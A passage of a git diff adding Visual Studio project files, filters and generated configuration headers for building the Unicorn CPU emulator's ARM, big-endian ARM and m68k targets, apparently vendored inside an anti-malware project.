<Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\arm.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c"> + <Filter>target-arm</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h new file mode 100644 index 0000000..84577a4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ARM 1 +#define TARGET_NAME "arm" +#define TARGET_ARM 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj new file mode 100644 index 0000000..ffac024 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj @@ -0,0 +1,235 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\armeb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{740F3007-7BF0-4C0C-8FA5-2587C794EF31}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>armebsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>armeb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters new file mode 100644 index 0000000..c85b448 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/armeb-softmmu.vcxproj.filters @@ -0,0 +1,137 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{5c1c56e9-7777-47ee-b021-c79bd6ad8c38}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{9c860878-f381-4c2e-86db-b7ba81b46c10}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{2f89d71a-2c88-497f-960b-42c3ac537df4}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{31088e8b-a2b5-4e0a-a288-4f9c537c350a}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{56559ccc-d240-4e06-b74b-8bd230f7fe07}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{b6c188d2-6b51-4697-ade2-a3c42f88a39d}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\armeb.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h new file mode 100644 index 0000000..8c27112 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/armeb-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ARM 1 +#define TARGET_NAME "armeb" +#define TARGET_ARM 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h new file mode 100644 index 0000000..15adc1d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/config-host.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define HOST_I386 1 +#define CONFIG_WIN32 1 +#define CONFIG_FILEVERSION 2,2,1,0 +#define CONFIG_PRODUCTVERSION 2,2,1,0 +#define CONFIG_CPUID_H 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h new file mode 100644 index 0000000..d0284a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_M68K 1 +#define TARGET_NAME "m68k" +#define TARGET_M68K 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj new file mode 100644 index 0000000..1c7cee9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj @@ -0,0 +1,226 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\m68k-qreg.h" /> + <ClInclude Include="..\..\..\qemu\target-m68k\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\m68k.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\m68k\dummy_m68k.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-m68k\unicorn.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2C5AD347-6E34-463B-8289-00578E43B255}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>m68ksoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" 